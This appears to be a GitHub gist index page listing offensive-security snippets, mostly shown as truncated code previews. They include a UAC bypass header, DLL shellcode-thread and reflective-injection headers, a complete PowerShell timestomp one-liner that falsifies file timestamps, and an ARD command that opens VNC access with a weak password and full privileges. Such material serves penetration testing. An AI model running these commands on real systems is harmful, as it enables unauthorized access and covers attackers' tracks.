ahhh’s gists

ahhh / bypass_uac.ps1

Created September 27, 2019 21:50 — forked from tyranid/bypass_uac.ps1

	# Powershell script to bypass UAC on Vista+ assuming
	# there exists one elevated process on the same desktop.
	# Technical details in:
	# https://tyranidslair.blogspot.co.uk/2017/05/reading-your-way-around-uac-part-1.html
	# https://tyranidslair.blogspot.co.uk/2017/05/reading-your-way-around-uac-part-2.html
	# https://tyranidslair.blogspot.co.uk/2017/05/reading-your-way-around-uac-part-3.html
	# You need to Install-Module NtObjectManager for this to run.

	Import-Module NtObjectManager

ahhh / gist:7643cd8705697a4b5302edad1b41ee37

Created September 12, 2019 20:29 — forked from obscuresec/gist:7b0cf71d7a8dd5e7b54c

PowerShell TimeStomp

PowerShell.exe -com {$file=(gi c:\demo\test.txt);$date='01/03/2006 12:12 pm';$file.LastWriteTime=$date;$file.LastAccessTime=$date;$file.CreationTime=$date}

ahhh / ARD Kickstarter (vuln)

Last active August 20, 2019 19:40

Starts ARD using a vulnerable VNC password

sudo /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Resources/kickstart -activate -configure -access -on -clientopts -setvnclegacy -vnclegacy yes -clientopts -setvncpw -vncpw mypasswd -restart -agent -privs -all

ahhh / DllMainThread.c

Created June 20, 2019 18:59 — forked from securitytube/DllMainThread.c

Launch Shellcode as a Thread via DllMain rather than a new process

	// Dll Hijacking via Thread Creation
	// Author - Vivek Ramachandran
	// Learn Pentesting Online -- http://PentesterAcademy.com/topics and http://SecurityTube-Training.com
	// Free Infosec Videos -- http://SecurityTube.net



	#include <windows.h>
	#define SHELLCODELEN 2048

ahhh / gethelp.cs

Created May 13, 2019 15:13

Help Me! MSDN InstallUtil - https://docs.microsoft.com/en-us/dotnet/api/system.configuration.install.installer.helptext?view=netframework-4.8

	using System;
	using System.Net;
	using System.Diagnostics;
	using System.Reflection;
	using System.Configuration.Install;
	using System.Runtime.InteropServices;

	/*
	Author: Casey Smith, Twitter: @subTee
	License: BSD 3-Clause

ahhh / Change Windows Network Profile

Created April 20, 2019 00:34

Change a windows connection profile from Public to Private or Domain via PowerShell to enable sharing

	Get-NetConnectionProfile

	Set-NetConnectionProfile -InterfaceIndex <index number> -NetworkCategory Private

ahhh / ManagedInstalls.plist

Created March 31, 2019 20:07

Used for configuring Munki administrative server on macOS clients

	<?xml version="1.0" encoding="UTF-8"?>
	<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
	<plist version="1.0">
	<dict>
	<key>ClientIdentifier</key>
	<string>arbitrary_name</string>
	<key>SoftwareRepoURL</key>
	<string>https://your_munki_server.com/munki_repo</string>
	<key>LoggingLevel</key>
	<integer>1</integer>

ahhh / ShellcodeRDI.go

Created February 13, 2019 03:23 — forked from leoloobeek/ShellcodeRDI.go

Go implementation of https://github.com/monoxgas/sRDI/

	package main

	/*
	*
	* This is just a Go implementation of https://github.com/monoxgas/sRDI/
	* Useful if you're trying to generate shellcode for reflective DLL
	* injection in Go, otherwise probably not much use :)
	*
	* The project, shellcode, most comments within this project
	* are all from the original project by @SilentBreakSec's Nick Landers (@monoxgas)

ahhh / google drive search filters

Created January 16, 2019 00:14

good drive search filters

ahhh / gobuster_looper.sh

Created September 12, 2018 19:27

A short script to run gobuster across a list of IP addresses: https://github.com/OJ/gobuster

	#!/bin/bash
	filename='ips.txt'
	outdir=$filename"_out/"
	mkdir $outdir
	filelines=`cat $filename`
	echo Start
	for line in $filelines ; do
	urls="https://"$line"/"
	outfile=$outdir$line
	./gobuster -k -u $urls -w ./wordlist.txt -o $outfile

	-owner:me # files not owned by me
	source:domain # all files in the domain

Dan Borges ahhh